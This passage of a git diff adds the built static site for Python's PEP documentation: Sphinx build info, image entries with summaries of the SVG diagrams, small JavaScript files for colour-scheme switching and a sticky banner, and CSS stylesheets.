diff --git a/.buildinfo b/.buildinfo new file mode 100644 index 00000000000..7285aa4cdf6 --- /dev/null +++ b/.buildinfo @@ -0,0 +1,4 @@ +# Sphinx build info version 1 +# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done. +config: a2c65ff4b368e636fe453f07402e58f4 +tags: d77d1c0d9ca2f4c8421862c7c5a0d620 diff --git a/.nojekyll b/.nojekyll new file mode 100644 index 00000000000..e69de29bb2d diff --git a/CNAME b/CNAME new file mode 100644 index 00000000000..581dc8addd2 --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +peps.python.org \ No newline at end of file diff --git a/_images/appendix-dl-by-installer.png b/_images/appendix-dl-by-installer.png new file mode 100644 index 00000000000..7d8cd856898 Binary files /dev/null and b/_images/appendix-dl-by-installer.png differ diff --git a/_images/appendix-dl-by-pip-version.png b/_images/appendix-dl-by-pip-version.png new file mode 100644 index 00000000000..2b23afb9b01 Binary files /dev/null and b/_images/appendix-dl-by-pip-version.png differ diff --git a/_images/circuit-breaking-protocol.svg b/_images/circuit-breaking-protocol.svg new file mode 100644 index 00000000000..39086bb0328 --- /dev/null +++ b/_images/circuit-breaking-protocol.svg @@ -0,0 +1,2 @@ + +
[SVG text content: flow diagram for evaluating "x if breaker else y" under the circuit breaking protocol. bool(breaker) is tested first: if True, the result is breaker.__then__(x); if False, the result is breaker.__else__(y). Annotations: when "x is breaker", this is a short-circuited "breaker else z"; when "y is breaker", this is a short-circuited "x if breaker".]
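To make the diagram concrete, here is a minimal Python sketch of the evaluation rule it depicts; eval_conditional is a hypothetical helper used only for illustration, not an API defined by the PEP:

    def eval_conditional(breaker, then_value, else_value):
        """Sketch of 'x if breaker else y' under the circuit breaking protocol."""
        if bool(breaker):
            # Truthy breaker: the diagram routes the result through breaker.__then__(x)
            return breaker.__then__(then_value)
        # Falsy breaker: the result comes from breaker.__else__(y)
        return breaker.__else__(else_value)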
\ No newline at end of file
diff --git a/_images/pep-0458-1.png b/_images/pep-0458-1.png new file mode 100644 index 00000000000..d455a22ac8f Binary files /dev/null and b/_images/pep-0458-1.png differ
diff --git a/_images/pep-0480-1.png b/_images/pep-0480-1.png new file mode 100644 index 00000000000..fe486abfd01 Binary files /dev/null and b/_images/pep-0480-1.png differ
diff --git a/_images/pep-0495-daylightsavings.png b/_images/pep-0495-daylightsavings.png new file mode 100644 index 00000000000..913d67de52a Binary files /dev/null and b/_images/pep-0495-daylightsavings.png differ
diff --git a/_images/pep-0495-fold.svg b/_images/pep-0495-fold.svg new file mode 100644 index 00000000000..2dfde2d8a17 --- /dev/null +++ b/_images/pep-0495-fold.svg @@ -0,0 +1,427 @@
[SVG text content: PEP 495 fold diagram — axis labels "UTC" and "local"; marked times t, u0, u1; region labeled "Fold".]
diff --git a/_images/pep-0495-gap.svg b/_images/pep-0495-gap.svg new file mode 100644 index 00000000000..090213a307a --- /dev/null +++ b/_images/pep-0495-gap.svg @@ -0,0 +1 @@ +
\ No newline at end of file
diff --git a/_images/pep-0525-1.png b/_images/pep-0525-1.png new file mode 100644 index 00000000000..356386fbb2a Binary files /dev/null and b/_images/pep-0525-1.png differ
diff --git a/_images/pep-0550-hamt_vs_dict-v2.png b/_images/pep-0550-hamt_vs_dict-v2.png new file mode 100644 index 00000000000..7518e597135 Binary files /dev/null and b/_images/pep-0550-hamt_vs_dict-v2.png differ
diff --git a/_images/pep-0550-lookup_hamt.png b/_images/pep-0550-lookup_hamt.png new file mode 100644 index 00000000000..adbe492e51e Binary files /dev/null and b/_images/pep-0550-lookup_hamt.png differ
diff --git a/_images/pep-0602-example-release-calendar.png b/_images/pep-0602-example-release-calendar.png new file mode 100644 index 00000000000..fdbf1a0f53f Binary files /dev/null and b/_images/pep-0602-example-release-calendar.png differ
diff --git a/_images/pep-0602-overlapping-support-matrix.png b/_images/pep-0602-overlapping-support-matrix.png new file mode 100644 index 00000000000..4620a10deca Binary files /dev/null and b/_images/pep-0602-overlapping-support-matrix.png differ
diff --git a/_images/pep-0603-hamt_vs_dict.png b/_images/pep-0603-hamt_vs_dict.png new file mode 100644 index 00000000000..eb1d4bc6d83 Binary files /dev/null and b/_images/pep-0603-hamt_vs_dict.png differ
diff --git a/_images/pep-0603-lookup_hamt.png b/_images/pep-0603-lookup_hamt.png new file mode 100644 index 00000000000..adbe492e51e Binary files /dev/null and b/_images/pep-0603-lookup_hamt.png differ
diff --git a/_images/pep-0605-example-release-calendar.png b/_images/pep-0605-example-release-calendar.png new file mode 100644 index 00000000000..f7998d240a0 Binary files /dev/null and b/_images/pep-0605-example-release-calendar.png differ
diff --git a/_images/pep-0605-overlapping-support-matrix.png b/_images/pep-0605-overlapping-support-matrix.png new file mode 100644 index 00000000000..f01c2c69a75 Binary files /dev/null and b/_images/pep-0605-overlapping-support-matrix.png differ
diff --git a/_images/pep-0732-concentric.drawio.svg b/_images/pep-0732-concentric.drawio.svg new file mode 100644 index 00000000000..02677c5ee5c --- /dev/null +++ b/_images/pep-0732-concentric.drawio.svg @@ -0,0 +1,4 @@
[SVG text content: three concentric circles, numbered 3-2-1 from outermost to innermost — 3: World (includes readers of the documentation); 2: Documentation Working Group (volunteers who contribute to the docs); 1: Documentation Editorial Board (a trusted group).]
\ No newline at end of file
diff --git a/_images/pep-3147-1.png b/_images/pep-3147-1.png new file mode 100644 index 00000000000..8c692667aa2 Binary files /dev/null and b/_images/pep-3147-1.png differ
diff --git a/_images/pep-789-example-no-yield.png b/_images/pep-789-example-no-yield.png new file mode 100644 index 00000000000..b27a9350c07 Binary files /dev/null and b/_images/pep-789-example-no-yield.png differ
diff --git a/_images/pep-789-example-yield-allowed.png b/_images/pep-789-example-yield-allowed.png new file mode 100644 index 00000000000..173926c4361 Binary files /dev/null and b/_images/pep-789-example-yield-allowed.png differ
diff --git a/_images/pep-789-example-yield-errors.png b/_images/pep-789-example-yield-errors.png new file mode 100644 index 00000000000..98bbbe8d6d0 Binary files /dev/null and b/_images/pep-789-example-yield-errors.png differ
diff --git a/_images/process_flow.svg b/_images/process_flow.svg new file mode 100644 index 00000000000..2f9a3b95004 --- /dev/null +++ b/_images/process_flow.svg @@ -0,0 +1,580 @@
[SVG text content: PEP status flow diagram — nodes: Provisional, Draft, Withdrawn, Rejected, Final, Accepted, Deferred, Active, Superseded.]
diff --git a/_static/colour_scheme.js b/_static/colour_scheme.js new file mode 100644 index 00000000000..ee94274d24b --- /dev/null +++ b/_static/colour_scheme.js @@ -0,0 +1,35 @@
+// Handle setting and changing the site's color scheme (light/dark)
+
+"use strict";
+
+const prefersDark = window.matchMedia("(prefers-color-scheme: dark)")
+
+const getColourScheme = () => document.documentElement.dataset.colour_scheme
+const setColourScheme = (colourScheme = getColourScheme()) => {
+  document.documentElement.dataset.colour_scheme = colourScheme
+  localStorage.setItem("colour_scheme", colourScheme)
+  setPygments(colourScheme)
+}
+
+// Map system theme to a cycle of steps
+const cycles = {
+  dark: ["auto", "light", "dark"], // auto (dark) → light → dark
+  light: ["auto", "dark", "light"], // auto (light) → dark → light
+}
+
+const nextColourScheme = (colourScheme = getColourScheme()) => {
+  const cycle = cycles[prefersDark.matches ? "dark" : "light"]
+  return cycle[(cycle.indexOf(colourScheme) + 1) % cycle.length]
+}
+
+const setPygments = (colourScheme = getColourScheme()) => {
+  const pygmentsDark = document.getElementById("pyg-dark")
+  const pygmentsLight = document.getElementById("pyg-light")
+  pygmentsDark.disabled = colourScheme === "light"
+  pygmentsLight.disabled = colourScheme === "dark"
+  pygmentsDark.media = colourScheme === "auto" ? "(prefers-color-scheme: dark)" : ""
+  pygmentsLight.media = colourScheme === "auto" ?
"(prefers-color-scheme: light)" : "" +} + +// Update Pygments state (the page theme is initialised inline, see page.html) +document.addEventListener("DOMContentLoaded", () => setColourScheme()) diff --git a/_static/mq.css b/_static/mq.css new file mode 100644 index 00000000000..2609a959ebd --- /dev/null +++ b/_static/mq.css @@ -0,0 +1,165 @@ +@charset "UTF-8"; + +/* Media Queries */ + +/* Reduce padding & margins for smaller screens */ +@media (max-width: 40em) { + section#pep-page-section { + padding: 1rem; + } + section#pep-page-section > header > h1 { + padding-right: 0; + border-right: none; + } + ul.breadcrumbs { + padding: 0 0 .5rem; + } + nav#pep-sidebar { + display: none; + } + pre { + font-size: 0.8175rem; + } + table th, + table td { + padding: 0 0.1rem; + } +} + +@media (min-width: 40em) { + section#pep-page-section { + display: table; + margin: 0 auto; + max-width: 75em; + padding: 0.5rem 1rem 0; + width: 100%; + } + section#pep-page-section > article { + max-width: 37em; + width: 74%; + float: right; + margin-right: 0; + font-size: 1rem; + } + nav#pep-sidebar { + width: 24%; + float: left; + margin-right: 2%; + } + /* Make less prominent when sidebar ToC is available */ + details > summary { + font-size: 1rem; + width: max-content; + } +} +@media (min-width: 60em) { + section#pep-page-section > article { + max-width: 56em; + padding-left: 3.2%; + padding-right: 3.2%; + } +} + +@media print { + *, + *:before, + *:after { + color: #000 !important; + } + body { + font-size: 10pt; + line-height: 1.67; + } + *[role="main"] a[href]:after { + content: " (" attr(href) ")"; + font-size: .75rem; + } + pre, + blockquote { + page-break-inside: avoid; + } + thead { + display: table-header-group; + } + tr, + img { + page-break-inside: avoid; + } + img { + max-width: 100% !important; + } + /* Page margins according to DIN 5008, leaves space for punched holes. */ + @page { + margin-top: 2cm; + margin-bottom: 2cm; + margin-left: 2.5cm; + margin-right: 2.5cm; + } + p, + h2, + h3 { + orphans: 3; + widows: 3; + } + h1, + h2, + h3 { + page-break-after: avoid; + } + h1 { + font-size: 18pt; + font-weight: bold; + text-align: center; + } + h2, details > summary { + font-size: 15pt; + font-weight: normal; + } + h3 { + font-size: 13pt; + font-weight: normal; + } + h4 { + font-size: 10pt; + font-weight: 600; + } + a, abbr { + text-decoration: none; + } + + details { + display: none; + } + details[open] { + display: block; + } + + h1.page-title:first-child { + margin-top: 0; + } + + section#pep-page-section { + display: flex; + justify-content: center; + padding: 0; + margin: 0 auto; + } + + section#pep-page-section > header, + nav#pep-sidebar { + display: none; + } + + section#pep-page-section > article { + float: none; + max-width: 17.5cm; + width: auto; + margin: 0; + padding: 0; + } + + /* This blocks a small portion on each page. 
*/ + readthedocs-flyout { + display: none; + } +} diff --git a/_static/og-image.png b/_static/og-image.png new file mode 100644 index 00000000000..0e80751e740 Binary files /dev/null and b/_static/og-image.png differ diff --git a/_static/py.png b/_static/py.png new file mode 100644 index 00000000000..93e4a02c3d3 Binary files /dev/null and b/_static/py.png differ diff --git a/_static/pygments.css b/_static/pygments.css new file mode 100644 index 00000000000..6110e9f1add --- /dev/null +++ b/_static/pygments.css @@ -0,0 +1,84 @@ +pre { line-height: 125%; } +td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; } +span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; } +td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +.highlight .hll { background-color: #ffffcc } +.highlight { background: #f8f8f8; } +.highlight .c { color: #8f5902; font-style: italic } /* Comment */ +.highlight .err { color: #a40000; border: 1px solid #ef2929 } /* Error */ +.highlight .g { color: #000000 } /* Generic */ +.highlight .k { color: #204a87; font-weight: bold } /* Keyword */ +.highlight .l { color: #000000 } /* Literal */ +.highlight .n { color: #000000 } /* Name */ +.highlight .o { color: #ce5c00; font-weight: bold } /* Operator */ +.highlight .x { color: #000000 } /* Other */ +.highlight .p { color: #000000; font-weight: bold } /* Punctuation */ +.highlight .ch { color: #8f5902; font-style: italic } /* Comment.Hashbang */ +.highlight .cm { color: #8f5902; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #8f5902; font-style: italic } /* Comment.Preproc */ +.highlight .cpf { color: #8f5902; font-style: italic } /* Comment.PreprocFile */ +.highlight .c1 { color: #8f5902; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #8f5902; font-style: italic } /* Comment.Special */ +.highlight .gd { color: #a40000 } /* Generic.Deleted */ +.highlight .ge { color: #000000; font-style: italic } /* Generic.Emph */ +.highlight .ges { color: #000000; font-weight: bold; font-style: italic } /* Generic.EmphStrong */ +.highlight .gr { color: #ef2929 } /* Generic.Error */ +.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */ +.highlight .gi { color: #00A000 } /* Generic.Inserted */ +.highlight .go { color: #000000; font-style: italic } /* Generic.Output */ +.highlight .gp { color: #8f5902 } /* Generic.Prompt */ +.highlight .gs { color: #000000; font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */ +.highlight .gt { color: #a40000; font-weight: bold } /* Generic.Traceback */ +.highlight .kc { color: #204a87; font-weight: bold } /* Keyword.Constant */ +.highlight .kd { color: #204a87; font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { color: #204a87; font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { color: #204a87; font-weight: bold } /* Keyword.Pseudo */ +.highlight .kr { color: #204a87; font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #204a87; font-weight: bold } /* Keyword.Type */ +.highlight .ld { color: #000000 } /* Literal.Date */ +.highlight .m { color: #0000cf; font-weight: bold } /* Literal.Number */ +.highlight .s { color: #4e9a06 } /* Literal.String */ +.highlight .na { color: #c4a000 } /* 
Name.Attribute */ +.highlight .nb { color: #204a87 } /* Name.Builtin */ +.highlight .nc { color: #000000 } /* Name.Class */ +.highlight .no { color: #000000 } /* Name.Constant */ +.highlight .nd { color: #5c35cc; font-weight: bold } /* Name.Decorator */ +.highlight .ni { color: #ce5c00 } /* Name.Entity */ +.highlight .ne { color: #cc0000; font-weight: bold } /* Name.Exception */ +.highlight .nf { color: #000000 } /* Name.Function */ +.highlight .nl { color: #f57900 } /* Name.Label */ +.highlight .nn { color: #000000 } /* Name.Namespace */ +.highlight .nx { color: #000000 } /* Name.Other */ +.highlight .py { color: #000000 } /* Name.Property */ +.highlight .nt { color: #204a87; font-weight: bold } /* Name.Tag */ +.highlight .nv { color: #000000 } /* Name.Variable */ +.highlight .ow { color: #204a87; font-weight: bold } /* Operator.Word */ +.highlight .pm { color: #000000; font-weight: bold } /* Punctuation.Marker */ +.highlight .w { color: #f8f8f8 } /* Text.Whitespace */ +.highlight .mb { color: #0000cf; font-weight: bold } /* Literal.Number.Bin */ +.highlight .mf { color: #0000cf; font-weight: bold } /* Literal.Number.Float */ +.highlight .mh { color: #0000cf; font-weight: bold } /* Literal.Number.Hex */ +.highlight .mi { color: #0000cf; font-weight: bold } /* Literal.Number.Integer */ +.highlight .mo { color: #0000cf; font-weight: bold } /* Literal.Number.Oct */ +.highlight .sa { color: #4e9a06 } /* Literal.String.Affix */ +.highlight .sb { color: #4e9a06 } /* Literal.String.Backtick */ +.highlight .sc { color: #4e9a06 } /* Literal.String.Char */ +.highlight .dl { color: #4e9a06 } /* Literal.String.Delimiter */ +.highlight .sd { color: #8f5902; font-style: italic } /* Literal.String.Doc */ +.highlight .s2 { color: #4e9a06 } /* Literal.String.Double */ +.highlight .se { color: #4e9a06 } /* Literal.String.Escape */ +.highlight .sh { color: #4e9a06 } /* Literal.String.Heredoc */ +.highlight .si { color: #4e9a06 } /* Literal.String.Interpol */ +.highlight .sx { color: #4e9a06 } /* Literal.String.Other */ +.highlight .sr { color: #4e9a06 } /* Literal.String.Regex */ +.highlight .s1 { color: #4e9a06 } /* Literal.String.Single */ +.highlight .ss { color: #4e9a06 } /* Literal.String.Symbol */ +.highlight .bp { color: #3465a4 } /* Name.Builtin.Pseudo */ +.highlight .fm { color: #000000 } /* Name.Function.Magic */ +.highlight .vc { color: #000000 } /* Name.Variable.Class */ +.highlight .vg { color: #000000 } /* Name.Variable.Global */ +.highlight .vi { color: #000000 } /* Name.Variable.Instance */ +.highlight .vm { color: #000000 } /* Name.Variable.Magic */ +.highlight .il { color: #0000cf; font-weight: bold } /* Literal.Number.Integer.Long */ \ No newline at end of file diff --git a/_static/pygments_dark.css b/_static/pygments_dark.css new file mode 100644 index 00000000000..d8ba6bf2ac3 --- /dev/null +++ b/_static/pygments_dark.css @@ -0,0 +1,85 @@ +pre { line-height: 125%; } +td.linenos .normal { color: #aaaaaa; background-color: transparent; padding-left: 5px; padding-right: 5px; } +span.linenos { color: #aaaaaa; background-color: transparent; padding-left: 5px; padding-right: 5px; } +td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; } +.highlight .hll { background-color: #404040 } +.highlight { background: #202020; color: #d0d0d0 } +.highlight .c { color: #ababab; font-style: italic } /* Comment */ +.highlight .err { color: #a61717; 
background-color: #e3d2d2 } /* Error */ +.highlight .esc { color: #d0d0d0 } /* Escape */ +.highlight .g { color: #d0d0d0 } /* Generic */ +.highlight .k { color: #6ebf26; font-weight: bold } /* Keyword */ +.highlight .l { color: #d0d0d0 } /* Literal */ +.highlight .n { color: #d0d0d0 } /* Name */ +.highlight .o { color: #d0d0d0 } /* Operator */ +.highlight .x { color: #d0d0d0 } /* Other */ +.highlight .p { color: #d0d0d0 } /* Punctuation */ +.highlight .ch { color: #ababab; font-style: italic } /* Comment.Hashbang */ +.highlight .cm { color: #ababab; font-style: italic } /* Comment.Multiline */ +.highlight .cp { color: #ff3a3a; font-weight: bold } /* Comment.Preproc */ +.highlight .cpf { color: #ababab; font-style: italic } /* Comment.PreprocFile */ +.highlight .c1 { color: #ababab; font-style: italic } /* Comment.Single */ +.highlight .cs { color: #e50808; font-weight: bold; background-color: #520000 } /* Comment.Special */ +.highlight .gd { color: #ff3a3a } /* Generic.Deleted */ +.highlight .ge { color: #d0d0d0; font-style: italic } /* Generic.Emph */ +.highlight .ges { color: #d0d0d0; font-weight: bold; font-style: italic } /* Generic.EmphStrong */ +.highlight .gr { color: #ff3a3a } /* Generic.Error */ +.highlight .gh { color: #ffffff; font-weight: bold } /* Generic.Heading */ +.highlight .gi { color: #589819 } /* Generic.Inserted */ +.highlight .go { color: #cccccc } /* Generic.Output */ +.highlight .gp { color: #aaaaaa } /* Generic.Prompt */ +.highlight .gs { color: #d0d0d0; font-weight: bold } /* Generic.Strong */ +.highlight .gu { color: #ffffff; text-decoration: underline } /* Generic.Subheading */ +.highlight .gt { color: #ff3a3a } /* Generic.Traceback */ +.highlight .kc { color: #6ebf26; font-weight: bold } /* Keyword.Constant */ +.highlight .kd { color: #6ebf26; font-weight: bold } /* Keyword.Declaration */ +.highlight .kn { color: #6ebf26; font-weight: bold } /* Keyword.Namespace */ +.highlight .kp { color: #6ebf26 } /* Keyword.Pseudo */ +.highlight .kr { color: #6ebf26; font-weight: bold } /* Keyword.Reserved */ +.highlight .kt { color: #6ebf26; font-weight: bold } /* Keyword.Type */ +.highlight .ld { color: #d0d0d0 } /* Literal.Date */ +.highlight .m { color: #51b2fd } /* Literal.Number */ +.highlight .s { color: #ed9d13 } /* Literal.String */ +.highlight .na { color: #bbbbbb } /* Name.Attribute */ +.highlight .nb { color: #2fbccd } /* Name.Builtin */ +.highlight .nc { color: #71adff; text-decoration: underline } /* Name.Class */ +.highlight .no { color: #40ffff } /* Name.Constant */ +.highlight .nd { color: #ffa500 } /* Name.Decorator */ +.highlight .ni { color: #d0d0d0 } /* Name.Entity */ +.highlight .ne { color: #bbbbbb } /* Name.Exception */ +.highlight .nf { color: #71adff } /* Name.Function */ +.highlight .nl { color: #d0d0d0 } /* Name.Label */ +.highlight .nn { color: #71adff; text-decoration: underline } /* Name.Namespace */ +.highlight .nx { color: #d0d0d0 } /* Name.Other */ +.highlight .py { color: #d0d0d0 } /* Name.Property */ +.highlight .nt { color: #6ebf26; font-weight: bold } /* Name.Tag */ +.highlight .nv { color: #40ffff } /* Name.Variable */ +.highlight .ow { color: #6ebf26; font-weight: bold } /* Operator.Word */ +.highlight .pm { color: #d0d0d0 } /* Punctuation.Marker */ +.highlight .w { color: #666666 } /* Text.Whitespace */ +.highlight .mb { color: #51b2fd } /* Literal.Number.Bin */ +.highlight .mf { color: #51b2fd } /* Literal.Number.Float */ +.highlight .mh { color: #51b2fd } /* Literal.Number.Hex */ +.highlight .mi { color: #51b2fd } /* 
Literal.Number.Integer */
+.highlight .mo { color: #51b2fd } /* Literal.Number.Oct */
+.highlight .sa { color: #ed9d13 } /* Literal.String.Affix */
+.highlight .sb { color: #ed9d13 } /* Literal.String.Backtick */
+.highlight .sc { color: #ed9d13 } /* Literal.String.Char */
+.highlight .dl { color: #ed9d13 } /* Literal.String.Delimiter */
+.highlight .sd { color: #ed9d13 } /* Literal.String.Doc */
+.highlight .s2 { color: #ed9d13 } /* Literal.String.Double */
+.highlight .se { color: #ed9d13 } /* Literal.String.Escape */
+.highlight .sh { color: #ed9d13 } /* Literal.String.Heredoc */
+.highlight .si { color: #ed9d13 } /* Literal.String.Interpol */
+.highlight .sx { color: #ffa500 } /* Literal.String.Other */
+.highlight .sr { color: #ed9d13 } /* Literal.String.Regex */
+.highlight .s1 { color: #ed9d13 } /* Literal.String.Single */
+.highlight .ss { color: #ed9d13 } /* Literal.String.Symbol */
+.highlight .bp { color: #2fbccd } /* Name.Builtin.Pseudo */
+.highlight .fm { color: #71adff } /* Name.Function.Magic */
+.highlight .vc { color: #40ffff } /* Name.Variable.Class */
+.highlight .vg { color: #40ffff } /* Name.Variable.Global */
+.highlight .vi { color: #40ffff } /* Name.Variable.Instance */
+.highlight .vm { color: #40ffff } /* Name.Variable.Magic */
+.highlight .il { color: #51b2fd } /* Literal.Number.Integer.Long */
\ No newline at end of file
diff --git a/_static/sticky_banner.js b/_static/sticky_banner.js new file mode 100644 index 00000000000..e20f62d2d33 --- /dev/null +++ b/_static/sticky_banner.js @@ -0,0 +1,38 @@
+"use strict";
+
+// Inject a style element into the document head that adds scroll-margin-top to
+// all elements with an id attribute. This is used to offset the scroll position
+// when clicking on a link to an element with an id attribute. The offset is
+// equal to the height of the sticky banner.
+document.addEventListener("DOMContentLoaded", () => {
+  const stickyBanners = document.getElementsByClassName("sticky-banner");
+  if (!stickyBanners.length) {
+    return;
+  }
+
+  const stickyBanner = stickyBanners[0];
+  const node = document.createElement("style");
+  node.id = "sticky-banner-style";
+  document.head.appendChild(node);
+
+  function adjustBannerMargin() {
+    const text = document.createTextNode(
+      ":target { scroll-margin-top: " + stickyBanner.offsetHeight + "px; }"
+    );
+    node.replaceChildren(text);
+  }
+
+  const closeButton = document.querySelector('.close-button');
+  if (closeButton) {
+    closeButton.addEventListener('click', () => {
+      const stickyBanner = document.querySelector('.sticky-banner');
+      if (stickyBanner) {
+        stickyBanner.style.display = 'none';
+      }
+    });
+  }
+
+  adjustBannerMargin();
+  window.addEventListener("resize", adjustBannerMargin);
+  window.addEventListener("load", adjustBannerMargin);
+});
diff --git a/_static/style.css b/_static/style.css new file mode 100644 index 00000000000..37323c27794 --- /dev/null +++ b/_static/style.css @@ -0,0 +1,475 @@
+@charset "UTF-8";
+
+/* Styles for PEPs */
+
+/*
+ * `initial` works like undefined variables, so `var(initial, x)` will resolve to `x`.
+ * A space means an empty value, so `var( , x) y` will resolve to `y`.
+ */ +@media (prefers-color-scheme: dark) { + :root { + --light: ; + --dark: initial; + } +} + +@media (prefers-color-scheme: light) { + :root { + --dark: ; + --light: initial; + } +} + +:root[data-colour_scheme="dark"] { + --light: ; + --dark: initial; +} + +:root[data-colour_scheme="light"] { + --dark: ; + --light: initial; +} + +/* Set master colours */ +:root { + --colour-background: var(--light, white) var(--dark, #111); + --colour-background-accent-strong: var(--light, #ccc) var(--dark, #444); + --colour-background-accent-medium: var(--light, #ddd) var(--dark, #333); + --colour-background-accent-light: var(--light, #eee) var(--dark, #222); + --colour-text: var(--light, #333) var(--dark, #ccc); + --colour-text-strong: var(--light, #222) var(--dark, #ddd); + --colour-links: var(--light, #069) var(--dark, #8bf); + --colour-links-light: var(--light, #057) var(--dark, #acf); + --colour-scrollbar: var(--light, #ccc) var(--dark, #333); + --colour-rule-strong: var(--light, #888) var(--dark, #777); + --colour-rule-light: var(--light, #ddd) var(--dark, #222); + --colour-inline-code-bg: var(--light, #eee) var(--dark, #333); + --colour-inline-code-text: var(--light, #222) var(--dark, #ccc); + --colour-error: var(--light, #faa) var(--dark, #800); + --colour-warning: var(--light, #fca) var(--dark, #840); + --colour-caution: var(--light, #ffa) var(--dark, #550); + --colour-attention: var(--light, #bdf) var(--dark, #045); + --colour-tip: var(--light, #bfc) var(--dark, #041); +} + +img.invert-in-dark-mode { + filter: var(--dark, invert(1) hue-rotate(.5turn)); +} + +/* Set master rules */ +* {box-sizing: border-box} +:root {color-scheme: light dark} +html { + overflow-y: scroll; + line-height: 1.5; + font-size: 1rem; + font-family: -apple-system, BlinkMacSystemFont, avenir next, avenir, segoe ui, helvetica neue, helvetica, Cantarell, Ubuntu, roboto, noto, arial, sans-serif; +} +body { + margin: 0; + color: var(--colour-text); + background-color: var(--colour-background); +} +section#pep-page-section { + padding: 0.25rem; +} + +/* This is likely very close to the browser default, but we make it a variable + * so it can be used in other rules. 
*/ +:root { + --paragraph-margin-vertical: 1em; +} +p { + margin: var(--paragraph-margin-vertical) 0; +} + +/* Header rules */ +h1 { + font-size: 2rem; + font-weight: bold; +} +h2 { + font-size: 1.6rem; + font-weight: bold; +} +h3 { + font-size: 1.4rem; + font-weight: normal; +} +h4 { + font-size: 1.2rem; + font-weight: normal; +} +h5, +h6 { + font-size: 1rem; + font-weight: bold; +} + +/* Anchor link rules */ +a, +a:active, +a:visited { + color: var(--colour-links); + display: inline; + overflow-wrap: anywhere; + text-decoration-color: var(--colour-background-accent-strong); +} +a:hover, +a:focus { + text-decoration-color: var(--colour-rule-strong); +} + +/* Blockquote rules */ +blockquote { + font-style: italic; + border-left: 1px solid var(--colour-rule-strong); + padding: .5rem 1rem; +} +blockquote em { + font-style: normal; +} + +cite { + font-style: italic; +} + +/* Code rules (code literals and Pygments highlighting blocks) */ +code, +pre { + font-family: Menlo, Consolas, Monaco, Liberation Mono, Lucida Console, monospace; + font-size: 0.875rem; + -webkit-hyphens: none; + hyphens: none; +} +code { + overflow-wrap: anywhere; +} +code.literal { + background-color: var(--colour-inline-code-bg); + color: var(--colour-inline-code-text); + font-size: .8em; + padding: 1px 2px 1px; +} +pre { + overflow-x: auto; + padding: .5rem .75rem; + white-space: pre; +} + +.good pre { + border-left: 3px solid rgba(74, 182, 93, 1); +} +.bad pre { + border-left: 3px solid rgb(244, 76, 78); +} +.maybe pre { + border-left: 3px solid rgb(244, 227, 76); +} + +/* Contents rules */ +details > summary { + cursor: pointer; + font-size: 1.6rem; + font-weight: bold; + margin-bottom: 1em; +} +details > summary:hover { + text-decoration: underline; +} + +/* Definition list rules */ +dl dt { + font-weight: bold; +} +dl dd { + margin-bottom: 0.5rem; +} + +/* Horizontal rule rule */ +hr { + border: 0; + border-top: 1px solid var(--colour-rule-light); +} +/* Image rules */ +img { + max-width: 100%; +} +a img { + display: block; + margin: 0 auto; +} + +/* List rules */ +ol.loweralpha {list-style: lower-alpha} +ol.upperalpha {list-style: upper-alpha} +ol.lowerroman {list-style: lower-roman} +ol.upperroman {list-style: upper-roman} + +/* We can't express this as a single rule using `not(.simple)`, because when a + * simple list is nested inside another simple list, the inner list is not given + * a class. So instead we use two rules, one more specific than the other. 
*/ +#pep-content ol li, +#pep-content ul li { + margin: var(--paragraph-margin-vertical) 0; +} +#pep-content ol.simple li, +#pep-content ul.simple li { + margin: 0 0; +} + +/* Maths rules */ +sub, +sup { + font-size: .75em; + line-height: 0; + position: relative; + vertical-align: baseline; +} +sup {top: -0.5em} +sub {bottom: -0.25em} + +/* Table rules */ +div.table-wrapper { + overflow-x: auto; +} +table { + width: 100%; + border-collapse: collapse; + border: 1px solid var(--colour-background-accent-strong); +} +table caption { + margin: 1rem 0 .75rem; +} +table thead tr { + background-color: var(--colour-background-accent-medium); + color: var(--colour-text-strong); +} +table tbody tr { + border-top: 1px solid var(--colour-background-accent-strong); +} +table th, +table td { + text-align: left; + padding: 0.25rem 0.5rem 0.2rem; +} +table.pep-zero-table tr td:nth-child(1), +table.pep-zero-table tr td:nth-child(2) { + white-space: nowrap; +} +table th + th, +table td + td { + border-left: 1px solid var(--colour-background-accent-strong); +} +/* Common column widths for PEP status tables */ +table.pep-zero-table tr td:nth-child(1) { + width: 5%; +} +table.pep-zero-table tr td:nth-child(2) { + width: 7%; +} +table.pep-zero-table tr td:nth-child(3), +table.pep-zero-table tr td:nth-child(4){ + width: 41%; +} +table.pep-zero-table tr td:nth-child(5) { + width: 6%; +} +/* Authors & Sponsors table */ +#authors-owners table td, +#authors-owners table th { + width: 50%; +} + +/* Numerical index */ +article:has(> section#numerical-index) { + float: unset !important; + width: 90% !important; + max-width: 90% !important; +} + +/* Breadcrumbs rules */ +section#pep-page-section > header { + border-bottom: 1px solid var(--colour-rule-light); +} +section#pep-page-section > header > h1 { + font-size: 1.1rem; + margin: 0; + display: inline-block; + padding-right: .6rem; + border-right: 1px solid var(--colour-rule-strong); +} +ul.breadcrumbs { + margin: 0; + padding: .5rem 0 .5rem .4rem; + list-style: none; + display: inline-block; +} +ul.breadcrumbs li { + display: inline; +} +ul.breadcrumbs a { + text-decoration: none; +} + +/* Dark mode toggle rules */ +#colour-scheme-cycler { + background: transparent; + border: none; + padding: 0; + cursor: pointer; + width: 1.2rem; + height: 1.2rem; + float: right; + transform: translate(0, 50%); +} +#colour-scheme-cycler svg { + color: var(--colour-rule-strong); + height: 1.2rem; + width: 1.2rem; + display: none; +} +:root[data-colour_scheme="auto"] #colour-scheme-cycler svg.colour-scheme-icon-when-auto {display: initial} +:root[data-colour_scheme="dark"] #colour-scheme-cycler svg.colour-scheme-icon-when-dark 